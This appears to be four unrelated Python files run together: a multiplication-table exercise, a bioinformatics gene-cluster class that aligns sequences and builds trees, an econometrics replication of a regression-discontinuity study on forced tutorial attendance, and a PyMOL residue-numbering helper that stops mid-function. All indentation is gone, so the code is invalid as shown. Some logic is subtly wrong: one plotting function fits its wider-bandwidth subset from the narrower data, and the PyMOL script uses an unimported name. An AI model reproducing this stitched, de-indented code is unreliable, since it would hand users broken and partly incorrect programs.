# Create a program that prints out a multiplication table for the numbers 1 through 9. It should include the numbers 1 through 9 on the top and left axises, and it should be relatively easy to find the product of two numbers. Do not simply write out every line manually (ie print('7 14 21 28 35 49 56 63') ).
#
# Subgoals
#
# As your products get larger, your columns will start to get crooked from the number of characters on each line. Clean up your table by evenly spacing columns so it is very easy to find the product of two numbers.
#
# Allow the user to choose a number to change the size of the table (so if they type in 12, the table printed out should be a 12x12 multiplication table).
maximum_number = int(input("Enter your highest number > ")) + 1
for i in range(1, maximum_number):
for j in range(1, maximum_number):
print("{:5}".format(i*j), end = "", flush=True)
print("")
|
from collections import Counter
from numpy import power
from numpy import log
from numpy import nan_to_num, prod
from Bio import SeqIO
import sh
import os
import shutil
class GeneCluster(object):
def __repr__(self): return '<%s object %s, annotated as %s with %i genes from %i genomes>' % (self.__class__.__name__, self.name, self.annotation, len(self.genes), len(self.genomes))
def __init__(self, clustering , genes, name = None, annotation = None ):
self.clustering = clustering
self.coreness = None
self.black_list = []
if type(genes) == dict :
self.from_dict(genes)
print "Don't forget to repair"
else:
self.name = name
self.from_list(genes, annotation)
def to_dict(self):
return {u'name': self.name, u'annot_fraction': self.annot_fraction, u'annotation': self.annotation, u'genes': self.genome_2_gene_map, u'mapping': self.mapping, "coreness" : self.coreness}
def from_dict(self,imp):
self.name = imp['name']
self.genes = imp['mapping'].keys()
self.genomes = imp['genes'].keys()
self.genome_2_gene_map = imp['genes']
self.annotation = imp['annotation']
self.annot_fraction = imp['annot_fraction']
self.mapping = imp['mapping']
self.coreness = imp['coreness'] if imp.has_key('coreness') else None
def from_list(self, genes, annotation):
self.genomes = list(set([g.split("|")[0] for g in genes]))
self.genes = [g.split("|")[1] for g in genes]
self.genome_2_gene_map = {go : [ge.split("|")[1] for ge in genes if go == ge.split("|")[0]] for go in self.genomes}
if annotation:
self.annotation = annotation
self.annot_fraction = None
self.mapping = None
else :
sub_dict = {g : self.clustering.id2name_map[g] for g in self.genes}
name_counts = Counter(sub_dict.values())
total = sum([name_counts[z] for z in name_counts])
annot_frac = float(name_counts.most_common()[0][1])/float(total)
self.annotation = name_counts.most_common(1)[0][0]
self.annot_fraction = annot_frac
self.mapping = sub_dict
# self.coreness = self.compute_coreness()
def to_sequences(self, short=False, genome_name = False, subset = None):
if not subset:
subset = set(self.genomes)
seqs = []
for g in self.genomes:
if g in subset:
genome = [ gg for gg in self.clustering.genomes if gg.metadata['short_name'] == g][0]
with open(genome.proteom, "r") as handle:
t_seqs = [s for s in SeqIO.parse(handle, "fasta") if s.id in self.genes and not s.id in self.black_list ]
if genome_name:
for s in t_seqs:
s.id = genome.metadata['short_name']
s.name = genome.metadata['short_name']
if short:
for s in t_seqs:
s.description = ""
seqs += t_seqs if t_seqs else []
return seqs
def calc_checksum(self, s):
return str(sum(ord(c)*i for i,c in enumerate(s)))
def align(self,output_file, block = True, genome_names = True, subset = None):
if not subset:
subset = self.genomes
with open("temp.faa","w") as unalign:
temp_seqs = self.to_sequences(short=True, genome_name = genome_names, subset = subset)
SeqIO.write(temp_seqs, unalign, "fasta")
sh.muscle("-in", "temp.faa","-out", "temp_aligned.faa")
os.remove("temp.faa")
if block:
try:
sh.Gblocks("temp_aligned.faa", "-t=p", "-b5=h", "-b4=2", "-b2=0", "-b3=2000", "-b1=0.3")
except:
pass
if os.path.exists("temp_aligned.faa-gb.htm"):
shutil.move("temp_aligned.faa-gb", output_file)
os.remove("temp_aligned.faa-gb.htm")
# sh.seqret("-sequence", "temp_aligned.faa", "-outseq", "nexus:" + ".".join(output_file.split(".")[:-1]) + ".nex")
os.remove("temp_aligned.faa")
return 1
else :
return 0
else:
sh.seqret("-sequence", "temp_aligned.faa", "-outseq", "nexus:" + ".".join(output_file.split(".")[:-1]) + ".nex")
shutil.move("temp_aligned.faa", output_file)
return 1
def tree_construction(self,alignment, outputtree):
sh.FastTree("-out", outputtree, alignment)
def core_probability(self):
present = prod([self.clustering.completnesses[self.clustering.rev_name_map[g]] for g in self.genomes])
abscent = prod([1-v for k,v in self.clustering.completnesses.iteritems() if k not in self.genomes and k in self.clustering.genome2len.keys()])
return present*abscent
def non_core_probability(self):
prob_of_random_pres = lambda g: 1.0 - power(float(len(self.clustering)-1)/len(self.clustering) , self.clustering.genome2len[self.clustering.rev_name_map[g]])
prob_of_random_absc = lambda g: power(float(len(self.clustering)-1)/len(self.clustering) , self.clustering.genome2len[self.clustering.rev_name_map[g]])
present = prod([prob_of_random_pres(g) for g in self.genomes])
abscent = prod([prob_of_random_absc(k) for k in self.clustering.genome2len.keys() if k not in self.genomes])
return present*abscent
def non_core_probability_plural(self):
prob_of_random_pres = lambda g: 1.0 - power(float(sum(self.clustering.genome2len.values())-len(self.genes))/sum(self.clustering.genome2len.values()) , self.clustering.genome2len[g])
prob_of_random_absc = lambda g: power(float(sum(self.clustering.genome2len.values())-len(self.genes))/sum(self.clustering.genome2len.values()) , self.clustering.genome2len[g])
present = prod([prob_of_random_pres(g) for g in self.genomes])
abscent = prod([prob_of_random_absc(k) for k in self.clustering.genome2len.keys() if k not in self.genomes])
return present*abscent
def compute_coreness(self) :
return log(self.core_probability()/self.non_core_probability())
|
import pandas as pd
import os
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from stargazer.stargazer import Stargazer
from scipy.stats import ttest_ind
from tabulate import tabulate
import statsmodels.formula.api as smf
def get_data():
df = pd.read_stata("data/ReplicationDataset_ThePriceofForcedAttendance.dta")
df["grade"] = df["grade"].astype(float)
# treatment variable
df["treat"] = 0
df.loc[df["firstyeargpa"] < 7, ["treat"]] = 1
# centered running variable
df["firstyeargpa_centered"] = -1*(df["firstyeargpa"] - 7)
# pass course variable
df["passcourse"] = 0
df.loc[df["grade"] >= 5.5, ["passcourse"]] = 1
return df
def get_variable_description(df):
df_var = {"Variable": df.columns.values, "Type": df.dtypes,
"Description":["unique student identifier","cohorts ranging from 2008 to 2014",
"attendance policy for above-7 students (voluntary, encouraged or forced)",
"second-year grades",
"second-year grades standardized","stdgrade of the abolition cohort",
"attendance rate of tutorials", "first-year average grade",
"indicator if first-year gpa was below 7",
"first-year average grade centered around 7",
"indicator if a second-year course was passed"]}
df_var = pd.DataFrame(df_var, columns=["Variable","Type","Description"])
return df_var.style.hide_index()
def get_truncated_data(df,bandwidth,cohort,coursetype):
if cohort==1:
df_temp = df.loc[df["cohort"] < 6]
elif cohort==6:
df_temp = df.loc[df["cohort"] == 6]
elif cohort== "all cohorts":
pass
if bandwidth == "total range":
pass
else:
df_temp = df_temp.loc[df_temp["firstyeargpa"]<=7 + bandwidth]
df_temp = df_temp.loc[df_temp["firstyeargpa"]>=7 - bandwidth]
if coursetype == "all courses":
pass
elif coursetype in ["voluntary","encouraged","forced"]:
df_temp = df_temp.loc[df_temp["coursepolicy"]== coursetype]
df_temp.reset_index(inplace=True)
return df_temp
def get_table1(df,bandwidth):
### mean and differences:
att_mean0,att_mean1 = round(df.groupby("treat")["attendance"].mean(),3)
att_diff = round(att_mean0 - att_mean1,3)
grade_mean0,grade_mean1 = round(df.groupby("treat")["grade"].mean(),3)
grade_diff = round(grade_mean0 - grade_mean1,3)
### standard deviations:
att_sd0, att_sd1 = round(df.groupby("treat")["attendance"].std(),3)
grade_sd0, grade_sd1 = round(df.groupby("treat")["grade"].std(),3)
### number of observations:
num_ind = df["treat"].value_counts()
num_ind[2] = num_ind[1] + num_ind[0]
### t-test of different means:
diff_stat = np.empty(2)
var = ["attendance","grade"]
for i,column in enumerate(var):
treated = df.query("treat == 1")[column]
control = df.query("treat == 0")[column]
diff_stat[i] = round(ttest_ind(treated, control)[1],3)
### table:
info = [["Variable | First-year GPA:",f" [{7-bandwidth},7.0]",f"[7,{7+bandwidth}]","Difference","p-value"]
,["Course level (second year)","","","",""]
,["Grade","","","",""]
,["mean",grade_mean1,grade_mean0,grade_diff,diff_stat[1]]
,["standard deviation",grade_sd1,grade_sd0,"",""]
,["","","","","",""]
,["Tutorial attendance","","","",""]
,["mean",round(att_mean1,3),round(att_mean0,3),att_diff,diff_stat[0]]
,["standard deviation",round(att_sd1,3),round(att_sd0,3),"",""]
,["","","","","",""]
,["Observations",num_ind[1],num_ind[0],num_ind[2],""]]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def collect_each_student(df):
sing_id = [df["studentid"][0]] # studendid of each student
sing_gpa = [df["firstyeargpa"][0]] # firstyeargpa of each student
for i in range(len(df)-1):
if df["studentid"][i] != df["studentid"][i+1]:
sing_id.append(df["studentid"][i+1])
sing_gpa.append(df["firstyeargpa"][i+1])
df_temp = pd.DataFrame(sing_id, columns=["studentid"])
df_temp["firstyeargpa"] = sing_gpa
return df_temp
def plot_gpahisto(df,bins):
plt.figure(figsize=(10, 6))
plt.hist(df["firstyeargpa"],bins=bins)#,edgecolor = "black")
plt.axvline(x=7, color='r')
#plt.axvline(x=6.635, color="orange")
#plt.axvline(x=7.335, color="orange")
#plt.fill_between(x1, 0, 50, color = 'k', alpha = 0.5)
plt.title("Histogram of First Year GPA")
plt.xlabel("First-year GPA")
plt.ylabel("Number of observations")
def get_subsetvol(cohort,df):
if cohort == "1to5":
df_temp = df.loc[df["cohort"] < 6]
if cohort == "6":
df_temp = df.loc[df["cohort"] == 6]
df_temp = df_temp.loc[df_temp["coursepolicy"]=="voluntary"]
df_temp.reset_index(inplace=True)
return df_temp
def get_bins_func(df,variable,coursetype):
mean_loc = np.zeros((20,1))
numobs_loc = np.zeros((20,1))
pos_loc = np.zeros((20,1))
df_temp = get_truncated_data(df,"total range",1,coursetype)
#df.temp = df.loc[df["coursepolicy"] == coursetype]
for i, xlow in enumerate(np.arange(6.5,7.5,0.05)):
df_temp1 = df_temp
df_temp1 = df_temp1.loc[df_temp1["firstyeargpa"]>=xlow]
df_temp1 = df_temp1.loc[df_temp1["firstyeargpa"]< xlow+0.05]
#df.temp1 = df.temp1.loc[df.temp1["attendance"]!=0]
mean_loc[i] = df_temp1[variable].mean()
numobs_loc[i] = len(df_temp1)
return(mean_loc, numobs_loc)
def get_figure1_1(df,coursetype):
### get positions of local averages
pos_loc = np.zeros((20,1))
for i, xlow in enumerate(np.arange(6.5,7.5,0.05)):
pos_loc[i,0] = xlow+0.05/2
### attendance results
att_mean_loc, att_numobs_loc = get_bins_func(df,"attendance",coursetype)
m_left, b_left = np.polyfit(pos_loc[3:10,0], att_mean_loc[3:10,0], 1)
m_right, b_right = np.polyfit(pos_loc[10:18,0], att_mean_loc[10:18,0], 1)
m3_left2, m2_left2, m1_left2, b_left2 = np.polyfit(pos_loc[:10,0], att_mean_loc[:10,0], 3)
m3_right2, m2_right2, m1_right2, b_right2 = np.polyfit(pos_loc[10:,0], att_mean_loc[10:,0], 3)
### stdgrade results
std_mean_loc, std_numobs_loc = get_bins_func(df,"stdgrade","voluntary")
m_left1, b_left1 = np.polyfit(pos_loc[3:10,0], std_mean_loc[3:10,0], 1)
m_right1, b_right1 = np.polyfit(pos_loc[10:18,0], std_mean_loc[10:18,0], 1)
m3_left22,m2_left22, m1_left22, b_left22 = np.polyfit(pos_loc[:10,0], std_mean_loc[:10,0], 3)
m3_right22,m2_right22, m1_right22, b_right22 = np.polyfit(pos_loc[10:,0], std_mean_loc[10:,0], 3)
### plot both graphs
fig, ax = plt.subplots(1,2,figsize=(14, 6))
plt.subplots_adjust(wspace=0.5)
plt.subplot(121)
plt.title(f"Attendance in {coursetype} courses")
ax = plt.scatter(pos_loc, att_mean_loc[:,0],s = att_numobs_loc[:,0], facecolors='black', edgecolors='black')
plt.ylim(0.4,1)
plt.axvline(x=7, color='r')
# plot the locally fitted linear regression line:
plt.plot(pos_loc[3:10,0], m_left*pos_loc[3:10,0]+b_left,color="b")
plt.plot(pos_loc[10:18,0], m_right*pos_loc[10:18,0]+b_right, color="b")
# plot the locally fitted cubic regression line:
plt.plot(pos_loc[:10,0], m1_left2*pos_loc[:10,0] + m2_left2*((pos_loc)**2)[:10,0]+ m3_left2*((pos_loc)**3)[:10,0] +b_left2, color="grey")
plt.plot(pos_loc[10:,0], m1_right2*pos_loc[10:,0] + m2_right2*((pos_loc)**2)[10:,0]+m3_right2*((pos_loc)**3)[10:,0] +b_right2, color="grey")
plt.xlabel('1st-year GPA')
plt.ylabel('Attendance rate')
plt.subplot(122)
plt.title(f"Grades in {coursetype} courses")
ax = plt.scatter(pos_loc, std_mean_loc[:,0],s = std_numobs_loc[:,0], facecolors='black', edgecolors='black')
plt.ylim(-0.5,0.5)
plt.axvline(x=7, color='r')
# plot the locally fitted linear regression line:
plt.plot(pos_loc[3:10,0], m_left1*pos_loc[3:10,0]+b_left1,color="b")
plt.plot(pos_loc[10:18,0], m_right1*pos_loc[10:18,0]+b_right1, color="b")
# plot the locally fitted cubic regression line:
plt.plot(pos_loc[:10,0], m1_left22*pos_loc[:10,0] + m2_left22*((pos_loc)**2)[:10,0]+ m3_left22*((pos_loc)**3)[:10,0] +b_left22, color="grey")
plt.plot(pos_loc[10:,0], m1_right22*pos_loc[10:,0] + m2_right22*((pos_loc)**2)[10:,0]+ m3_right22*((pos_loc)**3)[10:,0] +b_right22, color="grey")
plt.xlabel('1st-year GPA')
plt.ylabel('Grades (standardized)')
plt.plot()
def get_figure1_2(df,coursetype):
### get positions of local averages
pos_loc = np.zeros((20,1))
for i, xlow in enumerate(np.arange(6.5,7.5,0.05)):
pos_loc[i,0] = xlow+0.05/2
df_reg = get_truncated_data(df,0.3,1,coursetype)
X_L = df_reg.loc[df_reg["treat"]==1]
X_R = df_reg.loc[df_reg["treat"]==0]
df_reg3 = get_truncated_data(df,0.5,1,coursetype)
X_L3 = df_reg.loc[df_reg["treat"]==1]
X_R3 = df_reg.loc[df_reg["treat"]==0]
### attendance results
att_mean_loc, att_numobs_loc = get_bins_func(df,"attendance",coursetype)
m_left, b_left = np.polyfit(X_L["firstyeargpa"],X_L["attendance"],1)
m_right, b_right = np.polyfit(X_R["firstyeargpa"],X_R["attendance"],1)
m3_left2, m2_left2, m1_left2, b_left2 = np.polyfit(X_L3["firstyeargpa"],X_L3["attendance"], 3)
m3_right2, m2_right2, m1_right2, b_right2 = np.polyfit(X_R3["firstyeargpa"],X_R3["attendance"], 3)
### stdgrade results
std_mean_loc, std_numobs_loc = get_bins_func(df,"stdgrade","voluntary")
m_left1, b_left1 = np.polyfit(X_L["firstyeargpa"],X_L["stdgrade"],1)
m_right1, b_right1 = np.polyfit(X_R["firstyeargpa"],X_R["stdgrade"],1)
m3_left22,m2_left22, m1_left22, b_left22 = np.polyfit(X_L3["firstyeargpa"],X_L3["stdgrade"], 3)
m3_right22,m2_right22, m1_right22, b_right22 = np.polyfit(X_R3["firstyeargpa"],X_R3["stdgrade"], 3)
### plot both graphs
fig, ax = plt.subplots(1,2,figsize=(14, 6))
plt.subplots_adjust(wspace=0.5)
plt.subplot(121)
plt.title(f"Attendance in {coursetype} courses")
ax = plt.scatter(pos_loc, att_mean_loc[:,0],s = att_numobs_loc[:,0], facecolors='none', edgecolors='black')
plt.ylim(0.4,1)
plt.axvline(x=7, color='r')
# plot the locally fitted linear regression line:
plt.plot(pos_loc[3:10,0], m_left*pos_loc[3:10,0]+b_left,color="b")
plt.plot(pos_loc[10:18,0], m_right*pos_loc[10:18,0]+b_right, color="b")
# plot the locally fitted cubic regression line:
plt.plot(pos_loc[:10,0], m1_left2*pos_loc[:10,0] + m2_left2*((pos_loc)**2)[:10,0]+ m3_left2*((pos_loc)**3)[:10,0] +b_left2, color="grey")
plt.plot(pos_loc[10:,0], m1_right2*pos_loc[10:,0] + m2_right2*((pos_loc)**2)[10:,0]+m3_right2*((pos_loc)**3)[10:,0] +b_right2, color="grey")
plt.xlabel('1st-year GPA')
plt.ylabel('Attendance rate')
plt.subplot(122)
plt.title(f"Grades in {coursetype} courses")
ax = plt.scatter(pos_loc, std_mean_loc[:,0],s = std_numobs_loc[:,0], facecolors='none', edgecolors='black')
plt.ylim(-0.5,0.5)
plt.axvline(x=7, color='r')
# plot the locally fitted linear regression line:
plt.plot(pos_loc[3:10,0], m_left1*pos_loc[3:10,0]+b_left1,color="b")
plt.plot(pos_loc[10:18,0], m_right1*pos_loc[10:18,0]+b_right1, color="b")
# plot the locally fitted cubic regression line:
plt.plot(pos_loc[:10,0], m1_left22*pos_loc[:10,0] + m2_left22*((pos_loc)**2)[:10,0]+ m3_left22*((pos_loc)**3)[:10,0] +b_left22, color="grey")
plt.plot(pos_loc[10:,0], m1_right22*pos_loc[10:,0] + m2_right22*((pos_loc)**2)[10:,0]+ m3_right22*((pos_loc)**3)[10:,0] +b_right22, color="grey")
plt.xlabel('1st-year GPA')
plt.ylabel('Grades (standardized)')
plt.plot()
def get_interactionterms(df_input):
df = df_input
### treatment interaction term:
df["pol1"] = df["firstyeargpa"] - 7
df["pol1t"] = df["pol1"]*df["treat"]
### Coursetype indicator:
df["volcourse"] = 0
df.loc[df["coursepolicy"] == "voluntary", ["volcourse"]] = 1
df["forcourse"] = 0
df.loc[df["coursepolicy"] == "forced", ["forcourse"]] = 1
### Interaction terms: treatment x coursetype
df["treatmentvol"] = df["treat"]*df["volcourse"]
df["treatmentfor"] = df["treat"]*df["forcourse"]
df["pol1vol"] = df["pol1"]*df["volcourse"]
df["pol1for"] = df["pol1"]*df["forcourse"]
df["pol1tvol"] = df["pol1t"]*df["volcourse"]
df["pol1tfor"] = df["pol1t"]*df["forcourse"]
return df
def get_kweights(df_input,bandwidth):
df = df_input
df["kwgt"] = (1-abs((df["firstyeargpa"]-7)/bandwidth))
return df
def get_table3(df):
### regressions:
rslt = smf.ols(formula="stdgrade ~ treat + pol1+ pol1t", data=df, weights=df["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df["studentid"]})
rslt1 = rslt
formula2 = "stdgrade ~ treat + treatmentvol + treatmentfor + volcourse + forcourse + pol1 + pol1t + pol1vol + pol1tvol + pol1for + pol1tfor"
rslt = smf.ols(formula=formula2, data=df,weights=df["kwgt"] ).fit(cov_type='cluster',cov_kwds={'groups': df["studentid"]})
rslt2 = rslt
### Table stargazer:
stargazer = Stargazer([rslt1,rslt2])
stargazer.custom_columns(["column 1","column 4" ], [1,1])
stargazer.title("Table 3 - Effects on standardized grades")
stargazer.show_model_numbers(False)
stargazer.significant_digits(2)
stargazer.covariate_order([ "treat","treatmentvol","treatmentfor"])
stargazer.rename_covariates({"treat": "1st-year GPA is below 7",
"treatmentvol":"Attendance is voluntary x treatment",
"treatmentfor":"Absence is penalized x treatment"})
stargazer.show_degrees_of_freedom(False)
stargazer.add_line('Fixed Effects', ['No', 'No'])
return stargazer
def get_table4(rslt,coursetype):
rslt = np.round(rslt,3)
info = [["Variable","Treatment Effect","Stand. Error","p-value","Observations"]
,["Attendance rate","","","",""]
,["1st-year GPA below 7",rslt[0,0],rslt[0,1],rslt[0,2],rslt[0,3]]
,["","","","",""]
,["Grade (standardized)","","","",""]
,["1st-year GPA below 7",rslt[1,0],rslt[1,1],rslt[1,2],rslt[1,3]]
,["","","","",""]
,["Passes course","","","",""]
,["1st-year GPA below 7",rslt[2,0],rslt[2,1],rslt[2,2],rslt[2,3]]]
print(f"Table 4 - {coursetype} course type")
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table5(df_c15, df_c6):
av11 = round(df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)].mean(),3)
av12 = round(df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)].mean(),3)
n11 = len(df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)])
n12 = len(df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)])
av21 = round(df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)].mean(),3)
av22 = round(df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)].mean(),3)
n21 = len(df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)])
n22 = len(df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)])
# (1.) difference within cohort 1-5:
treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)]
control = df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)]
diff_stat1 = round(ttest_ind(treated,control)[1],3)
# (2.) difference within cohort 6:
treated = df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)]
control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)]
diff_stat2 = round(ttest_ind(treated,control)[1],3)
# (3.) difference between cohorts below 7:
treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(6.9,6.9999)]
control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(6.9,6.9999)]
diff_stat3 = round(ttest_ind(treated,control)[1],3)
# (4.) difference between cohorts above 7:
treated = df_c15["grade"].loc[df_c15["firstyeargpa"].between(7,7.1)]
control = df_c6["grade"].loc[df_c6["firstyeargpa"].between(7,7.1)]
diff_stat4 = round(ttest_ind(treated,control)[1],3)
# Create a table:
info = [["Cohort | First-year GPA:","[6.9,7.0]","[7.0,7.1]","Difference","p-value"], ["2009-2013","","","",""]
,["Second-year Grade Average",av11,av12,round(av12-av11,3),diff_stat1]
,["Observations",n11,n12,"",""]
,["","","","","",""]
,["2014","","","",""]
,["Second-year Grade Average",av21,av22,round(av22-av21,3),diff_stat2]
,["Observations",n21,n22,"",""]
,["","","","","",""]
,["Difference between cohorts",round(av21-av11,3),round(av22-av12,3),"" ,"" ]
, ["p-value",diff_stat3,diff_stat4,"",""]]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table_spec1(df,coursetype,rslt_rdrobust):
df1 = get_truncated_data(df,0.365,1,coursetype)
df11 = get_interactionterms(df1)
df_reg = get_kweights(df11,0.365)
rslt = smf.ols(formula="attendance ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt_att_b = rslt.params[1]
rslt_att_p = rslt.pvalues[1]
rslt = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt_grade_b = rslt.params[1]
rslt_grade_p = rslt.pvalues[1]
rslt = smf.ols(formula="passcourse ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt_pass_b = rslt.params[1]
rslt_pass_p = rslt.pvalues[1]
rslt_att_b = np.round(rslt_att_b,3)
rslt_att_p = np.round(rslt_att_p,3)
rslt_grade_b = np.round(rslt_grade_b,3)
rslt_grade_p = np.round(rslt_grade_p,3)
rslt_pass_b = np.round(rslt_pass_b,3)
rslt_pass_p = np.round(rslt_pass_p,3)
rslt_r = np.round(rslt_rdrobust,3)
info = [["Variable","Treatment Effect","p-value","Treatment Effect (rdrobust)","p-value"]
,["Attendance Rate",rslt_att_b,rslt_att_p,rslt_r[0,0],rslt_r[0,2]]
,["Standardized Grades",rslt_grade_b,rslt_grade_p,rslt_r[1,0],rslt_r[1,2]]
,["Passes Course",rslt_pass_b,rslt_pass_p,rslt_r[2,0],rslt_r[2,2]]
]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_table_spec2(df,coursetype):
### get data
df_temp = get_truncated_data(df,0.365,1,coursetype)
df_temp1 = get_interactionterms(df_temp)
df_reg = get_kweights(df_temp1,0.365)
### create polynomials
df_reg["X2"] = df_reg["firstyeargpa_centered"]**2
df_reg["X3"] = df_reg["firstyeargpa_centered"]**3
df_reg["pol1t2"] = df_reg["X2"]*df_reg["treat"]
df_reg["pol1t3"] = df_reg["X3"]*df_reg["treat"]
### linear regression
rslt = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + pol1t", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt_b = rslt.params[1]
rslt_p = rslt.pvalues[1]
### quadratic regression
rslt2 = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + X2 + pol1t + pol1t2", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt2_b = rslt2.params[1]
rslt2_p = rslt2.pvalues[1]
### cubic regression
rslt3 = smf.ols(formula="stdgrade ~ treat + firstyeargpa_centered + X2 + X3 + pol1t + pol1t2 + pol1t3", data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
rslt3_b = rslt3.params[1]
rslt3_p = rslt3.pvalues[1]
### Table
info = [["Order of Polynomial","Treatment Effect","p-value"]
,["Locally Linear",rslt_b,rslt_p]
,["Locally Quadratic",rslt2_b,rslt2_p]
,["Locally Cubic",rslt3_b,rslt3_p]
]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_fakecutoff(df,coursetype,y_var):
rslt_temp = np.zeros((4,3))
for i,c in enumerate([6,8,8.25,9]):
### data
df_reg = get_truncated_data(df,"total range",1,coursetype)
### create running variable centered at fake cutoff and fake treatment variables
df_reg["X_fake"] = -1*(df_reg["firstyeargpa"] - c)
df_reg["treat_fake"] = 0
df_reg.loc[df_reg["firstyeargpa"] < c, ["treat_fake"]] = 1
df_reg["treat_X_fake"] = df_reg["treat_fake"] * df_reg["X_fake"]
df_reg["kwgt_fake"] = 0
df_reg.loc[abs(df_reg["X_fake"]) <= 0.365, ["kwgt_fake"]] = (1-abs((df["firstyeargpa"]-c)/0.365))
#print(df_reg[["X_fake","kwgt_fake"]])
#df_reg["kwgt_fake"] = (1-abs((df["firstyeargpa"]-c)/0.365))
### locally linear regression
formula = y_var + " ~ treat_fake + X_fake + treat_X_fake"
rslt = smf.ols(formula=formula, data=df_reg, weights=df_reg["kwgt_fake"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
### save results
rslt_temp[i,0] = c
rslt_temp[i,1] = rslt.params[1]
rslt_temp[i,2] = rslt.pvalues[1]
#rslt_temp = np.round(rslt_temp,3)
return rslt_temp
def get_table_fakecutoff(rslt_input):
rslt_bw = np.round(rslt_input,3)
info = [["Fake Cutoff at","Treatment Effect","p-value"]
,[rslt_bw[0,0],rslt_bw[0,1],rslt_bw[0,2]]
,[rslt_bw[1,0],rslt_bw[1,1],rslt_bw[1,2]]
,[rslt_bw[2,0],rslt_bw[2,1],rslt_bw[2,2]]
,[rslt_bw[3,0],rslt_bw[3,1],rslt_bw[3,2]]
]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def get_bandwidth_results(df,coursetype,y_var):
### empty results canvas:
rslt_temp = np.zeros((6,3))
for i,h in enumerate([0.5, 0.4, 0.365, 0.3, 0.2, 0.1]):
### data within bandwidth:
df_temp = get_truncated_data(df,h,1,coursetype)
df_temp1 = get_interactionterms(df_temp)
df_reg = get_kweights(df_temp1, h)
### locally linear regression
formula = y_var + " ~ treat + firstyeargpa_centered + pol1t"
rslt = smf.ols(formula=formula, data=df_reg, weights=df_reg["kwgt"]).fit(cov_type='cluster',cov_kwds={'groups': df_reg["studentid"]})
### save regression results
rslt_temp[i,0] = h
rslt_temp[i,1] = rslt.params[1]
rslt_temp[i,2] = rslt.pvalues[1]
return rslt_temp
def get_table_spec4(rslt_input):
rslt_bw = np.round(rslt_input,3)
info = [["Bandwidth","Treatment Effect","p-value"]
,[rslt_bw[0,0],rslt_bw[0,1],rslt_bw[0,2]]
,[rslt_bw[1,0],rslt_bw[1,1],rslt_bw[1,2]]
,[rslt_bw[2,0],rslt_bw[2,1],rslt_bw[2,2]]
,[rslt_bw[3,0],rslt_bw[3,1],rslt_bw[3,2]]
,[rslt_bw[4,0],rslt_bw[4,1],rslt_bw[4,2]]
,[rslt_bw[5,0],rslt_bw[5,1],rslt_bw[5,2]]
]
print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid')) |
#This function will return the Rosetta pose number for residues in a selection, if the object were saved to a PDB file.
#This will be determined based on the object that contains the selection.
#When determining pose numbering, residues with only hydrogens will be ignored, as will HOH or WAT.
#Strange multiple states, residue ordering, segis, and chains could result in unusual behaviour.
from pymol import cmd
def pdb2pose(poseres):
"""
DESCRIPTION
The "pdb2pose" command returns the Rosetta-style pose number of a selection of residues.
USAGE
pdb2pose poseres
ARGUMENTS
poseres = string: selection with the residues to process.
NOTES
A selection that spans multiple objects is unsupported, and will produce an error.
The pose numbering returned will be for the current version of the object. Adding, removing, re-ordering, or sorting residues will alter the pose number.
Multi-state selections may yield unexpected results.
If the selection has different chain IDs and segids, this may also result in unexpected chain ordering.
Residues containing only hydrogen atoms and water molecules will be ignored.
"""
#Determine what object contains the selection.
poseobj = cmd.get_object_list(poseres)
#Assert that the selection must be in a single object
assert (len(poseobj) == 1), "Your selection spans multiple objects (or no objects). Select one object only."
#Count the number of residues in the selection.
#First, set up a get_model object.
selemodel = cmd.get_model(poseres)
#Iterate over all atoms in selemodel, storing chain and resi in a list called atomlist.
atomlist = []
for curatom in selemodel.atom:
atomlist.append(str(curatom.resi) + curatom.chain)
#Remove duplicates by making converting atomlist to a set then a list.
atomlist = list(set(atomlist))
#atomlist should now have one instance of each residue in pdb numbering format (ie. 35A).
#We now need to iterate over the poseobj. Start counting at 1. If we encounter a new residue, iterate counter.
#First, store lists of chain and resi for the object in atomlist_chain, atomlist_resi, and atomlist_resn
stored.atomlist_chain = []
stored.atomlist_resi = []
cmd.iterate(poseobj[0] + ' and not elem H and not resn HOH and not resn WAT', 'stored.atomlist_chain.append(chain); stored.atomlist_resi.append(resi)')
#Set up a tracking variable for chain and resi.
curchain = ''
curresi = ''
#Set up a pose number variable.
